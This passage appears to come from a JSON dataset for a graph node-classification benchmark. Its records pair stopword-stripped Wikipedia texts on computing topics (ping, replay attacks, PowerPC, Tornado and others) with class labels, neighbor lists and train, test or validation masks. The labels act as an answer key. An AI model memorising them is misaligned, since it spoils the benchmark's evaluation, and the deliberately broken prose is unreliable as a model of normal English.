      5197,
      6223,
      10452,
      8538,
      2781,
      8440,
      2273,
      1890,
      5857,
      7780,
      7918,
      8046,
      3698,
      5875,
      10231,
      2680,
      3323,
      7164,
      6655
    ],
    "mask": "None"
  },
  {
    "node_id": 8689,
    "label": 1,
    "text": "Web_SQL_Database:web sql database web sql database web page api storing data databases queried using variant sql api supported google chrome opera safari android browser w3c web applications working group ceased working specification november 2010 citing lack independent implementations i.e use database system sqlite backend reason specification could move forward become w3c recommendation mozilla corporation one major voices behind break-up negotiations deprecation standard time main proponents behind 'alternative storage standard indexeddb",
    "neighbors": [
      8584,
      1802,
      10506,
      9229,
      6034,
      11154,
      1556,
      10020,
      5546,
      10026,
      7212,
      10284,
      10413,
      4658,
      9395,
      2485,
      1468,
      4797,
      8644,
      11466,
      3920,
      2901,
      5849,
      5593,
      6366,
      865,
      7784,
      9834,
      9841,
      119,
      124,
      9726
    ],
    "mask": "Test"
  },
  {
    "node_id": 8690,
    "label": 2,
    "text": "Progeny_Linux_Systems:progeny linux systems progeny linux systems company provided linux platform technology platform services technology supported debian rpm-based distributions linux platforms progeny linux systems based indianapolis ian murdock founder debian founder chairman board cto john h. hartman bruce byfield marketing communications director progeny created operating system called progeny componentized linux progeny eventually announced via post mailing lists 1 may 2007 ceasing operations progeny componentized linux usually called progeny debian defunct free operating system progeny announced post various mailing lists 1 may 2007 ceasing operations shut website progeny debian alternative debian 3.1 furthermore based upon linux standard base lsb 3.0 adopting technology anaconda installer ported red hat advanced packaging tool discover progeny debian aimed model developing component-based linux",
    "neighbors": [
      4123,
      2692,
      7204,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 8691,
    "label": 8,
    "text": "Tornado_(web_server):tornado web server tornado scalable non-blocking web server web application framework written python developed use friendfeed company acquired facebook 2009 tornado open-sourced soon tornado noted high performance tries solve c10k problem affecting servers",
    "neighbors": [
      9229,
      2062,
      7695,
      2576,
      9245,
      8739,
      2596,
      44,
      5165,
      10800,
      6714,
      2130,
      595,
      84,
      102,
      11376,
      3705,
      11386,
      148,
      8350,
      5791,
      3746,
      3237,
      4777,
      7338,
      9387,
      11439,
      8883,
      692,
      190,
      7359,
      1222,
      225,
      1250,
      4837,
      6379,
      2287,
      7430,
      11017,
      7443,
      1812,
      6941,
      10526,
      7457,
      8994,
      3876,
      7980,
      9518,
      7983,
      7987,
      9538,
      1353,
      1363,
      4439,
      8539,
      6493,
      865,
      2404,
      8554,
      9580,
      10611,
      3966,
      10622,
      1920,
      11134,
      4485,
      3462,
      8582,
      9614,
      7567,
      1937,
      6555,
      11682,
      9125,
      4529,
      5047,
      5048,
      6074,
      9666,
      8644,
      1991,
      11221,
      4056,
      3545,
      7147,
      5612,
      11259
    ],
    "mask": "Test"
  },
  {
    "node_id": 8692,
    "label": 4,
    "text": "Ping_(networking_utility):ping networking utility ping computer network administration software utility used test reachability host internet protocol ip network available virtually operating systems networking capability including embedded network administration software ping measures round-trip time messages sent originating host destination computer echoed back source name comes active sonar terminology sends pulse sound listens echo detect objects water ping operates sending internet control message protocol icmp echo request packets target host waiting icmp echo reply program reports errors packet loss statistical summary results typically including minimum maximum mean round-trip times standard deviation mean command-line options ping utility output vary numerous implementations options may include size payload count tests limits number network hops ttl probes traverse interval requests many systems provide companion utility ping6 testing internet protocol version 6 ipv6 networks implement icmpv6 ping utility written mike muuss december 1983 employment ballistic research laboratory us army research laboratory created tool troubleshoot problems ip network mike muuss inspired remark david mills using icmp echo packets ip network diagnosis measurements author named sound sonar makes since methodology analogous sonar echo location first released version public domain software subsequent versions licensed bsd license ping first included 4.3bsd freedos version developed erick engelke licensed gpl tim crawford developed reactos version licensed mit license rfc 1122 prescribes host must process icmp echo requests issue echo replies return following output running ping linux sending five probes target host www.example.com output lists probe message results obtained finally lists statistics entire test example shortest round trip time 9.674 ms average 10.968 ms maximum value 11.726 ms measurement standard deviation 0.748 ms cases response target host implementations display either nothing periodically print notifications timing possible ping results indicating problem include following case error target host intermediate router sends back icmp error message example host unreachable ttl exceeded transit addition messages include first eight bytes original message case header icmp echo request including quench value ping utility match responses originating queries generic composition icmp packet echo request ping icmp/icmp6 message identifier sequence number used client match reply request caused reply practice linux systems use unique identifier every ping process sequence number increasing number within process windows uses fixed identifier varies windows versions sequence number reset boot time echo reply icmp message generated response echo request mandatory hosts must include exact payload received request payload packet generally filled ascii characters output tcpdump utility shows last 32 bytes following example eight-byte icmp header starting payload may include timestamp indicating time transmission sequence number found example allows ping compute round trip time stateless manner without needing record time transmission packet payload may also include magic packet wake-on-lan protocol minimum payload case longer shown echo request typically receive reply host sleeping hibernation state host still wakes sleep state interface configured accept wakeup requests host already active configured allow replies incoming icmp echo request packets returned reply include payload may used detect remote host effectively woken repeating new request delay allow host resume network services host sleeping low power active state single request wakes host enough allow echo reply service reply instantly service enabled host need completely wake devices may return low power mode short delay configuration may used avoid host enter hibernation state much longer wake delay time passed low power active mode conduct denial-of-service attack attacker may send ping requests fast possible possibly overwhelming victim icmp echo requests technique called ping flood ping requests multiple addresses ping sweeps may used obtain list hosts network",
    "neighbors": [
      515,
      516,
      9733,
      1030,
      9735,
      2568,
      6674,
      8729,
      9780,
      3659,
      4174,
      4687,
      6735,
      4703,
      3169,
      1647,
      9839,
      5759,
      8834,
      6281,
      6797,
      4750,
      2198,
      4248,
      6812,
      7329,
      4771,
      7847,
      1705,
      2739,
      7356,
      10428,
      11464,
      10442,
      1741,
      1750,
      9946,
      3292,
      4850,
      7411,
      2292,
      6396,
      4349,
      1796,
      8975,
      3856,
      2324,
      5402,
      292,
      296,
      808,
      4398,
      10033,
      1336,
      5437,
      7486,
      9024,
      8517,
      8522,
      5968,
      6992,
      11607,
      7003,
      5469,
      5470,
      5472,
      2409,
      6506,
      5492,
      7031,
      2430,
      3970,
      3460,
      10631,
      3976,
      4495,
      2960,
      4001,
      7088,
      1978,
      4543,
      960,
      965,
      3024,
      8664,
      5085,
      10727,
      6120,
      5612,
      4589,
      9709,
      2545,
      11249,
      11250,
      9204,
      9721,
      6138,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 8693,
    "label": 3,
    "text": "Conway's_law:conway law conway law adage named computer programmer melvin conway introduced idea 1967 states law based reasoning order software module function multiple authors must communicate frequently therefore software interface structure system reflect social boundaries organization produced across communication difficult conway law intended valid sociological observation although sometimes used humorous context dubbed conway law participants 1968 national symposium modular programming eric s. raymond open-source advocate restated conway law new hacker dictionary reference work based jargon file organization software organization software team congruent said summarizing example conway paper raymond wrote four groups working compiler 'll get 4-pass compiler james o. coplien neil b. harrison stated one also see impact conway law design corporate websites nigel bevan usability expert stated 1998 organisations often produce web sites content structure mirrors internal concerns organisation rather needs users site similar effect may found websites undergo design committee evidence support conway law published team massachusetts institute technology mit harvard business school researchers using mirroring hypothesis equivalent term conway law found strong evidence support mirroring hypothesis significant differences product modularity consistent view distributed teams tend develop modular products additional likewise supportive case studies conway law conducted nagappan murphy basili university maryland collaboration microsoft syeed hammouda tampere university technology finland",
    "neighbors": [
      9573
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8694,
    "label": 4,
    "text": "Replay_attack:replay attack replay attack also known playback attack form network attack valid data transmission maliciously fraudulently repeated delayed carried either originator adversary intercepts data re-transmits possibly part masquerade attack ip packet substitution one lower tier versions man-in-the-middle attack another way describing attack attack security protocol using replay messages different context intended original expected context thereby fooling honest participant thinking successfully completed protocol run suppose alice wants prove identity bob bob requests password proof identity alice dutifully provides possibly transformation like hash function meanwhile eve eavesdropping conversation keeps password hash interchange eve posing alice connects bob asked proof identity eve sends alice password hash read last session bob accepts thus granting eve access replay attacks prevented tagging encrypted component session id component number using combination solutions use anything interdependent one another interdependency fewer vulnerabilities works unique random session id created run program thus previous run becomes difficult replicate case attacker would unable perform replay new run session id would changed session ids also known session tokens one mechanism used help avoid replay attacks way generating session id works follows session tokens chosen random process usually pseudorandom processes used otherwise eve may able pose bob presenting predicted future token convince alice use token transformation eve replay reply later time previously predicted token actually presented bob bob accept authentication one-time passwords similar session tokens password expires used short amount time used authenticate individual transactions addition sessions also used authentication process help establish trust two parties communicating bob also send nonces include message authentication code mac alice check timestamping another way preventing replay attack synchronization achieved using secure protocol example bob periodically broadcasts time clock together mac alice wants send bob message includes best estimate time clock message also authenticated bob accepts messages timestamp within reasonable tolerance advantages scheme bob need generate pseudo- random numbers alice n't need ask bob random number networks unidirectional near unidirectional advantage trade-off replay attacks performed quickly enough i.e within 'reasonable limit could succeed kerberos authentication protocol includes countermeasures classical case replay attack message captured adversary replayed later date order produce effect example banking scheme vulnerable attack message results transfer funds could replayed transfer funds originally intended however kerberos protocol implemented many versions ldap microsoft windows active directory includes use scheme involving time stamps severely limit effectiveness replay attacks messages past time live ttl considered old discarded improvements proposed including using triple password scheme three passwords used authentication server ticket granting server tgs servers use passwords encrypt messages secret keys different servers encryption provided three keys help aid preventing replay attacks wireless ad hoc networks also susceptible replay attacks case authentication system improved made stronger extending aodv protocol method improving security ad hoc networks increases security network small amount overhead extensive overhead network would run risk becoming slower performance would decrease keeping relatively low overhead network maintain better performance still improving security authentication sign-on clients using point-to-point protocol ppp susceptible reply attacks using password authentication protocol pap validate identity authenticating client sends username password clear authenticating server sends acknowledgement response intercepting client therefore free read transmitted data impersonate client server well able store client credentials later impersonation server challenge-handshake authentication protocol chap secures sort replay attack authentication phase instead using challenge message authenticator client responds hash-computed value based shared secret e.g client password authenticator compares calculation challenge shared secret authenticate client relying shared secret transmitted well features authenticator-controlled repetition challenges changing identifier challenge values chap provides limited protection replay attacks several real world examples replay attacks used issues detected fixed order prevent attacks many vehicles road use remote keyless system key fob convenience user modern systems hardened simple replay attacks vulnerable buffered replay attacks attack performed placing device receive transmit radio waves within range target vehicle transmitter attempt jam rf vehicle unlock signal sent placing buffer later use upon attempts unlock vehicle transmitter jam new signal cache play back old one creating rolling buffer one step ahead vehicle later time attacker may use buffered code unlock vehicle various devices use speaker recognition verify identity speaker text-dependent systems attacker record target individual ’ speech correctly verified system play recording verified system counter-measure devised using spectral bitmaps stored speech verified users replayed speech different pattern scenario rejected system",
    "neighbors": [
      8828,
      3460,
      11524,
      262,
      8978,
      767,
      4863,
      1941,
      5657,
      5404,
      3742,
      8095,
      2080,
      3490,
      2470,
      2087,
      11175,
      3629,
      10801,
      4793,
      5433,
      6975,
      2497,
      4163,
      1608,
      6098,
      10329,
      6877,
      223,
      5472,
      7265,
      2274,
      10344,
      2928,
      8432,
      11639,
      2426,
      1276,
      895
    ],
    "mask": "None"
  },
  {
    "node_id": 8695,
    "label": 9,
    "text": "Philip_S._Abrams:philip s. abrams philip s. abrams computer science researcher co-authored first implementation programming language apl 1962 kenneth e. iverson published book programming language describing mathematical notation describing array operations mathematics 1965 abrams lawrence m. breed produced compiler translated expressions iverson apl notation ibm 7090 machine code 1970s vice president development scientific time sharing corporation stsc inc",
    "neighbors": [
      8987,
      9019,
      1883,
      9825,
      11099,
      9993,
      11625,
      1099,
      4331,
      10668,
      2670,
      3323,
      7630,
      2519,
      4921,
      505,
      1178,
      667
    ],
    "mask": "Train"
  },
  {
    "node_id": 8696,
    "label": 4,
    "text": "Procera_Networks:procera networks procera networks networking equipment company based fremont california united states designs sells network intelligence solutions based deep packet inspection dpi technology procera sells solutions telecom operators governments enterprises network equipment vendors areas analytics traffic management policy charging control service provider compliance procera incorporated 2002 california company initially created deliver intelligent ethernet network switches company changed product line merged netintact company based varberg sweden offered bandwidth management products scandinavian network operators packetlogic brand merger announced may closed june 2006 procera shifted company product strategy netintact product lines 2006 2008 procera sold inexpensive less 2 gbit/s traffic management products small operators enterprises operators like com hem sweden september 2007 procera networks became listed american stock exchange stock symbol pkt beginning 2008 procera began focusing larger carriers mobile operators several customers reported use procera technology yoigo genband resells procera products p-series products procera named one fastest growing network companies deloitte 2010 2011 part deloitte fast 500 study june 24 2011 procera networks joined russell 3000 index december 2011 procera moved nasdaq stock exchange using symbol pkt 2013 procera bought vineyard networks canadian dpi company c 28 million vineyard product sold market network application visibility library navl network equipment vendors 2015 procera acquired francisco partners private equity firm based san francisco procera operates private company longer listed nasdaq 2017 francisco partners acquired sandvine merged procera procera offers network intelligence solutions based version deep packet inspection dpi called datastream recognition definition language drdl drdl uses properties applications identification purposes allows operators manage subscriber traffic based application similar many dpi products procera offers 100 use cases analytics traffic management policy enforcement service provider compliance october 2016 alleged procera sold dpi software government turkey via telecoms company turk telecom order reveal usernames passwords people visiting unencrypted websites according forbes significant internal opposition technologists working procera sale current former employees said told forbes 'turk telekom requested feed subscribers ’ usernames passwords unencrypted websites also ip addresses sites ’ visited",
    "neighbors": [
      10417,
      1015
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8697,
    "label": 2,
    "text": "Terminal_mode:terminal mode terminal mode one set possible states terminal pseudo terminal character device unix-like systems determines characters written terminal interpreted cooked mode data preprocessed given program raw mode passes data as-is program without interpreting special characters system intercepts special characters cooked mode interprets special meaning backspace delete control-d typically used enable line-editing input running programs control characters control-c control-z used job control associated signals precise definition constitutes cooked mode operating system-specific example “ abc backspace ” given input program terminal character device cooked mode program gets “ abd ” terminal raw mode program gets characters “ abc ” followed backspace character followed “ ” cooked mode terminal line discipline processes characters “ abc backspace ” presents result “ abd ” program technically term “ cooked mode ” associated streams terminal line discipline generally applied system amount preprocessing cbreak mode sometimes called rare mode mode raw mode cooked mode unlike cooked mode works single characters time rather forcing wait whole line feeding line unlike raw mode keystrokes like abort usually control-c still processed terminal interrupt process",
    "neighbors": [
      8262,
      5896,
      4750,
      7983,
      10833,
      7188,
      5397,
      2521
    ],
    "mask": "None"
  },
  {
    "node_id": 8698,
    "label": 2,
    "text": "Honor_8x:honor 8x honor 8x smartphone made huawei honor sub-brand successor huawei honor 8x within huawei honor series honor 8x 6.5-inch fhd+ display screen resolution 1,080 x 2,340 pixels 396 ppi pixel density 19.5:9 aspect ratio together deliver satisfying visual experience phone 20mp 2mp dual primary cameras pdaf dual flash click sharp life-like pictures pleasant colour reproductions front camera 16mp takes detailed selfies honor 8x carries rather average 64gb internal storage expanded 400gb device powered huawei hisilicon kirin 710 chipset two quad-core cortex a53 processors achieve 2.2ghz clock speed mali-t830 mp2 gpu 4gb ram phone delivers fluid performance apps games also rear-mounted fingerprint scanner improved security honor 8x uses a3,750mah li-polymer cell powers phone throughout day ease 4g volte compatible smartphone dual nano-sim slots second slot hybrid networks work without issue additional networking features include wifi bluetooth location support a-gps glonass assisted standard micro usb charging port 3.5 mm audio jack wired headphones.the phone comes 64 128 gigabytes storage 4 6 gb ram depending region display pixel resolution 1920x1080 pixel density 397 ppi honor 8x 16 mp front-facing camera dual rear camera setup consists 12 mp rgb lens 20-megapixel monochrome lens record video 1080p electronic image stabilization 1080p video honor 8x launched android oreo version 8.1 huawei emui 8.0. upgradable android 9.0 pie emui 9.0",
    "neighbors": [
      10658,
      5100,
      9244,
      2383,
      1776,
      5467,
      2259,
      11282,
      1083,
      7548,
      2525,
      10303
    ],
    "mask": "Test"
  },
  {
    "node_id": 8699,
    "label": 4,
    "text": "Cookiemonster_attack:cookiemonster attack cookiemonster attack man-in-the-middle exploit third party gain https cookie data encrypted sessions property properly set could allow access sites sensitive personal financial information python based tool developed security researcher mike perry perry originally announced vulnerability exploited cookiemonster bugtraq 2007 year later demonstrated cookiemonster proof concept tool defcon 16 users world wide web reduce exposure cookiemonster attacks avoiding websites unprotected attacks certain web browsers make possible user establish sites example users firefox browser go privacy tab preferences window click 'show cookies given site inspecting individual cookies top level name site subdomain names reveal 'send encrypted connections set user test site vulnerability cookiemonster attacks deleting cookies visiting site site still allows user site vulnerable cookiemonster attacks websites allegedly affected cookiemonster included",
    "neighbors": [
      8554,
      5078,
      119,
      87,
      7965,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 8700,
    "label": 3,
    "text": "PowerPC:powerpc powerpc backronym performance optimization enhanced risc – performance computing sometimes abbreviated ppc reduced instruction set computer risc instruction set architecture isa created 1991 apple–ibm–motorola alliance known aim powerpc evolving instruction set since 2006 named power isa old name lives trademark implementations power architecture-based processors powerpc cornerstone aim prep common hardware reference platform initiatives 1990s originally intended personal computers architecture well known used apple power macintosh powerbook imac ibook xserve lines 1994 2006 apple migrated intel x86 since become niche personal computers remains popular embedded high-performance processors use 7th generation video game consoles embedded applications provided array uses addition powerpc cpus still used amigaone third party amigaos 4 personal computers powerpc largely based ibm earlier power instruction set architecture retains high level compatibility architectures remained close enough programs operating systems run care taken preparation newer chips power series use power isa history risc began ibm 801 research project john cocke lead developer developed concepts risc 1975–78 801-based microprocessors used number ibm embedded products eventually becoming 16-register ibm romp processor used ibm rt pc rt pc rapid design implementing risc architecture years 1982–1984 ibm started project build fastest microprocessor market new 32-bit architecture became referred america project throughout development cycle lasted approximately 5–6 years result power instruction set architecture introduced risc system/6000 early 1990 original power microprocessor one first superscalar risc implementations high performance multi-chip design ibm soon realized single-chip microprocessor needed order scale rs/6000 line lower-end high-end machines work began one-chip power microprocessor designated rsc risc single chip early 1991 ibm realized design could potentially become high-volume microprocessor used across industry apple already realized limitations risks dependency upon single cpu vendor time motorola falling behind delivering 68040 cpu furthermore apple conducted research made experimental quad-core cpu design called aquarius convinced company technology leadership future computing risc methodology ibm approached apple goal collaborating development family single-chip microprocessors based power architecture soon apple one motorola largest customers desktop-class microprocessors asked motorola join discussions due long relationship motorola extensive experience manufacturing high-volume microprocessors ibm form second source microprocessors three-way collaboration apple ibm motorola became known aim alliance 1991 powerpc one facet larger alliance among three companies time personal computer industry shipping systems based intel 80386 80486 chips complex instruction set computer cisc architecture development pentium processor well underway powerpc chip one several joint ventures involving three alliance members efforts counter growing microsoft-intel dominance personal computing motorola power looked like unbelievable deal allowed company sell widely tested powerful risc cpu little design cash part also maintained ties important customer apple seemed offer possibility adding ibm might buy smaller versions motorola instead making point motorola already risc design form 88000 poorly market motorola well 68000 family majority funding focused 88000 effort somewhat starved resources 88000 already production however data general shipping 88000 machines apple already 88000 prototype machines running 88000 also achieved number embedded design wins telecom applications new power one-chip version could made bus-compatible hardware level 88000 would allow apple motorola bring machines market far faster since would redesign board architecture result various requirements powerpc performance computing specification differences earlier power instruction set powerpc outlined appendix e manual powerpc isa v.2.02 since 1991 ibm long-standing desire unifying operating system would simultaneously host existing operating systems personalities upon one microkernel 1991 1995 company designed aggressively evangelized would become workplace os primarily targeting powerpc first powerpc products reached market met enthusiasm addition apple ibm motorola computer group offered systems built around processors microsoft released windows nt 3.51 architecture used motorola powerpc servers sun microsystems offered version solaris os ibm ported aix unix workplace os featured new port os/2 intel emulation application compatibility pending successful launch powerpc 620 throughout mid-1990s powerpc processors achieved benchmark test scores matched exceeded fastest x86 cpus ultimately demand new architecture desktop never truly materialized windows os/2 sun customers faced lack application software powerpc almost universally ignored chip ibm workplace os platform thus os/2 powerpc summarily canceled upon first developers release december 1995 due simultaneous buggy launch powerpc 620 powerpc versions solaris windows discontinued brief period market macintosh due apple persistence powerpc gain traction apple performance powerpc bright spot face increased competition windows 95 windows nt-based pcs cancellation workplace os general powerpc platform especially aim common hardware reference platform instead seen hardware-only compromise run many operating systems one time upon single unifying vendor-neutral hardware platform parallel alliance ibm motorola companies development efforts underway internally powerquicc line result work inside motorola 4xx series embedded processors underway inside ibm ibm embedded processor business grew nearly us 100 million revenue attracted hundreds customers toward close decade manufacturing issues began plaguing aim alliance much way motorola consistently pushed back deployments new processors apple vendors first motorola 1990s powerpc 7xx 74xx processors ibm 64-bit powerpc 970 processor 2003 2004 motorola exited chip manufacturing business spinning semiconductor business independent company called freescale semiconductor around time ibm exited 32-bit embedded processor market selling line powerpc products applied micro circuits corporation amcc focusing 64-bit chip designs maintaining commitment powerpc cpus toward game console makers nintendo gamecube wii sony playstation 3 microsoft xbox 360 latter two use 64-bit processors 2005 apple announced would longer use powerpc processors apple macintosh computers favoring intel-produced processors instead citing performance limitations chip future personal computer hardware specifically related heat generation energy usage well inability ibm move 970 processor 3 ghz range ibm-freescale alliance replaced open standards body called power.org power.org operates governance ieee ibm continuing use evolve powerpc processor game consoles freescale semiconductor focusing solely embedded devices ibm continues develop powerpc microprocessor cores use application-specific integrated circuit asic offerings many high volume applications embed powerpc cores powerpc specification handled power.org ibm freescale amcc members powerpc cell power processors jointly marketed power architecture power.org released unified isa combining power powerpc isas new power isa v.2.03 specification new reference platform servers called papr power architecture platform reference ibm power microprocessors implement power isa used ibm ibm power systems running ibm aix linux many powerpc designs named labeled apparent technology generation began g3 internal project name inside aim development would become powerpc 750 family apple popularized term g3 introduced power mac g3 powerbook g3 event 10 november 1997 motorola apple liked moniker used term g4 7400 family introduced 1998 power mac g4 1999 time g4 launched motorola categorized powerpc models former current future according generation adhered even renaming older 603e core g2 motorola g5 project never came fruition name stuck apple reused 970 family launched 2003 even designed built ibm powerpc designed along risc principles allows superscalar implementation versions design exist 32-bit 64-bit implementations starting basic power specification powerpc added instructions present power instruction set deemed complex removed powerpc architecture removed instructions could emulated operating system necessary removed instructions powerpc chips switch endianness via bit msr machine state register second bit provided allow os run different endianness accesses inverted page table hash table functions tlb off-chip storage always done big-endian mode processor starts big-endian mode little-endian mode three lowest-order bits effective address exclusive-ored three bit value selected length operand enough appear fully little-endian normal software operating system see warped view world accesses external chips video network hardware fixing warped view requires motherboard perform unconditional 64-bit byte swap data entering leaving processor endianness thus becomes property motherboard os operates little-endian mode big-endian motherboard must swap bytes undo exclusive-or accessing little-endian chips altivec operations despite 128-bit treated 64-bit allows compatibility little-endian motherboards designed prior altivec interesting side effect implementation program store 64-bit value longest operand format memory one endian mode switch modes read back 64-bit value without seeing change byte order case motherboard switched time mercury systems matrox ran powerpc little-endian mode done powerpc devices serving co-processors pci boards could share data structures host computers based x86 pci x86 little-endian os/2 windows nt powerpc ran processor little-endian mode solaris aix linux ran big endian ibm embedded powerpc chips use per-page endianness bit none previous applies first implementation architecture powerpc 601 released 1992 based rsc implementing hybrid power1 powerpc instructions allowed chip used ibm existing power1-based platforms although also meant slight pain switching 2nd generation pure powerpc designs apple continued work new line macintosh computers based chip eventually released 601-based power macintosh march 14 1994 ibm also full line powerpc based desktops built ready ship unfortunately operating system ibm intended run desktops—microsoft windows nt—was complete early 1993 machines ready marketing accordingly ibm developed animosity toward microsoft ibm decided port os/2 powerpc form workplace os new software platform spent three years 1992 1995 development canceled december 1995 developer release disappointing launch powerpc 620 reason ibm powerpc desktops ship although reference design codenamed sandalbow based powerpc 601 cpu released rs/6000 model byte april 1994 issue included extensive article apple ibm powerpc desktops apple also lacked powerpc based os took different route utilizing portability platform yielded secret star trek project company ported essential pieces mac os operating system powerpc architecture wrote 68k emulator could run 68k based applications parts os rewritten second generation pure includes low end powerpc 603 high end powerpc 604 603 notable due low cost power consumption deliberate design goal motorola part used 603 project build basic core future generations ppc chips apple tried use 603 new laptop design unable due small 8 kib level 1 cache 68000 emulator mac os could fit 8 kib thus slowed computer drastically 603e solved problem 16 kib l1 cache allowed emulator run efficiently 1993 developers ibm essex junction burlington vermont facility started work version powerpc would support intel x86 instruction set directly cpu one several concurrent power architecture projects ibm working chip began known inside ibm media powerpc 615 profitability concerns rumors performance issues switching x86 native powerpc instruction sets resulted project canceled 1995 limited number chips produced in-house testing aside rumors switching process took 5 cycles amount time needed processor empty instruction pipeline microsoft also aided processor demise refusing support powerpc mode first 64-bit implementation powerpc 620 appears seen little use apple n't want buy large die area costly embedded market later slower promised ibm used power3 design instead offering 64-bit small version late-2002 introduction powerpc 970 970 64-bit processor derived power4 server processor create power4 core modified backward-compatible 32-bit powerpc processors vector unit similar altivec extensions motorola 74xx series added ibm rs64 processors family chips implementing amazon variant powerpc architecture processors used rs/6000 as/400 computer families amazon architecture includes proprietary extensions used as/400 power4 later power processors implement amazon architecture replaced rs64 chips rs/6000 as/400 families ibm developed separate product line called 4xx line focused embedded market designs included 401 403 405 440 460 2004 ibm sold 4xx product line applied micro circuits corporation amcc amcc continues develop new high performance products partly based ibm technology along technology developed within amcc products focus variety applications including networking wireless storage printing/imaging industrial automation numerically powerpc mostly found controllers cars automotive market freescale semiconductor initially offered many variations called mpc5xx family mpc555 built variation 601 core called 8xx designed israel msil motorola silicon israel limited 601 core single issue meaning issue one instruction clock cycle add various bits custom hardware allow i/o one chip 2004 next-generation four-digit 55xx devices launched automotive market use newer e200 series powerpc cores networking another area embedded powerpc processors found large numbers msil took quicc engine mc68302 made powerquicc mpc860 famous processor used many cisco edge routers late 1990s variants powerquicc include mpc850 mpc823/mpc823e variants include separate risc microengine called cpm offloads communications processing tasks central processor functions dma follow-on chip family mpc8260 603e-based core different cpm honda also uses powerpc processors asimo 2003 bae systems platform solutions delivered vehicle-management computer f-35 fighter jet platform consists dual powerpcs made freescale triple redundant setup operating systems work powerpc architecture generally divided oriented toward general-purpose powerpc systems oriented toward embedded powerpc systems companies licensed 64-bit power 32-bit powerpc ibm include powerpc processors used number now-discontinued video game consoles power architecture currently used following desktop computers power architecture currently used following embedded applications",
    "neighbors": [
      6148,
      6150,
      2058,
      4112,
      2066,
      4114,
      6165,
      2071,
      2073,
      8222,
      6181,
      6183,
      8231,
      4139,
      4144,
      2105,
      8253,
      6207,
      2113,
      8266,
      4180,
      2137,
      6233,
      2149,
      6245,
      6258,
      4211,
      10357,
      8315,
      4220,
      6268,
      10365,
      2179,
      4228,
      6283,
      4238,
      147,
      6300,
      4258,
      6311,
      4269,
      2224,
      2225,
      2226,
      4286,
      6352,
      213,
      10463,
      6371,
      231,
      6377,
      10478,
      10481,
      246,
      8439,
      249,
      8441,
      8450,
      10501,
      6415,
      10516,
      2334,
      8480,
      291,
      2339,
      295,
      10543,
      309,
      8501,
      321,
      8514,
      10562,
      4423,
      8525,
      336,
      8530,
      6483,
      2388,
      342,
      8534,
      344,
      8539,
      8540,
      6495,
      8544,
      10601,
      10603,
      8557,
      10608,
      4465,
      10612,
      6528,
      6539,
      2452,
      407,
      409,
      10658,
      426,
      8621,
      10669,
      2480,
      8624,
      435,
      10675,
      4534,
      446,
      10691,
      453,
      6607,
      6608,
      466,
      2517,
      8662,
      4569,
      8665,
      10715,
      10734,
      6639,
      499,
      4596,
      6643,
      2551,
      2553,
      10746,
      508,
      8700,
      10752,
      6663,
      8715,
      10767,
      528,
      10779,
      10781,
      10786,
      10796,
      6705,
      10808,
      8761,
      6715,
      10813,
      6718,
      2623,
      576,
      8771,
      2638,
      10838,
      10840,
      2656,
      10851,
      8806,
      2666,
      2667,
      8815,
      6771,
      10869,
      10872,
      4734,
      6783,
      10878,
      641,
      4741,
      4743,
      8842,
      6797,
      6799,
      2704,
      8851,
      2708,
      4758,
      6807,
      8857,
      8861,
      6815,
      6818,
      4773,
      6821,
      682,
      684,
      8877,
      6834,
      8890,
      8893,
      8896,
      10945,
      8899,
      708,
      6852,
      6854,
      4807,
      2761,
      4810,
      10966,
      731,
      6878,
      2784,
      8931,
      6884,
      4841,
      8937,
      10985,
      8944,
      757,
      2805,
      2811,
      6914,
      4868,
      6924,
      781,
      6925,
      4879,
      784,
      4880,
      4881,
      6926,
      8976,
      6942,
      4897,
      6949,
      6950,
      9003,
      4910,
      815,
      11054,
      823,
      11066,
      9020,
      9022,
      6995,
      9044,
      863,
      4961,
      869,
      11123,
      7033,
      9084,
      7039,
      11135,
      5006,
      11153,
      7065,
      2979,
      9126,
      11174,
      936,
      11180,
      11184,
      5049,
      5054,
      5058,
      3014,
      3017,
      5065,
      9163,
      5072,
      11218,
      5078,
      9174,
      9176,
      7134,
      9182,
      5090,
      995,
      9190,
      3050,
      11257,
      7170,
      7173,
      1042,
      7187,
      11289,
      1057,
      7204,
      1064,
      1067,
      7211,
      7218,
      11314,
      11322,
      9280,
      1090,
      7234,
      7235,
      3142,
      9302,
      1115,
      3167,
      9312,
      11363,
      7269,
      3175,
      11374,
      3185,
      7281,
      5235,
      3188,
      7286,
      1145,
      9337,
      3197,
      9342,
      7299,
      11395,
      1158,
      7302,
      7305,
      11405,
      5264,
      7313,
      1170,
      9363,
      9371,
      1181,
      7326,
      1185,
      3241,
      9391,
      5297,
      3250,
      3255,
      11447,
      11449,
      7361,
      5329,
      5339,
      3293,
      3294,
      11487,
      3296,
      9445,
      3304,
      5356,
      5358,
      3319,
      5368,
      1273,
      11513,
      3323,
      3324,
      5375,
      5378,
      7432,
      1290,
      9487,
      1298,
      11539,
      5397,
      7445,
      1309,
      1321,
      3371,
      9525,
      5448,
      9547,
      7505,
      3410,
      11613,
      1376,
      9579,
      11629,
      7534,
      5492,
      1399,
      1402,
      3451,
      7549,
      1409,
      3457,
      11649,
      7561,
      3467,
      1422,
      3470,
      3472,
      5518,
      5520,
      1428,
      3483,
      3493,
      9637,
      9638,
      1448,
      1461,
      1462,
      1463,
      5569,
      9665,
      1482,
      3540,
      9685,
      1499,
      7645,
      9700,
      7653,
      1515,
      5612,
      5616,
      5619,
      1534,
      5642,
      9739,
      1548,
      7697,
      7699,
      5655,
      7706,
      1563,
      5663,
      1576,
      3630,
      3652,
      1606,
      3654,
      5725,
      1632,
      1635,
      3691,
      5743,
      7806,
      1666,
      7824,
      7830,
      5793,
      7842,
      7844,
      7845,
      1702,
      9892,
      7852,
      7858,
      9911,
      1725,
      7869,
      9921,
      9927,
      9928,
      9931,
      9932,
      1744,
      3793,
      7889,
      9938,
      9952,
      7911,
      7913,
      1772,
      9964,
      1776,
      3844,
      7941,
      1798,
      3846,
      1801,
      9996,
      3857,
      1820,
      5922,
      10023,
      3886,
      7983,
      7984,
      5948,
      3911,
      3928,
      5976,
      3932,
      3936,
      10089,
      1903,
      8048,
      8058,
      3966,
      6020,
      3977,
      10121,
      1933,
      10133,
      10149,
      8102,
      10153,
      1964,
      8109,
      1967,
      4017,
      6072,
      8120,
      4030,
      1983,
      1985,
      6084,
      10180,
      8136,
      10199,
      10214,
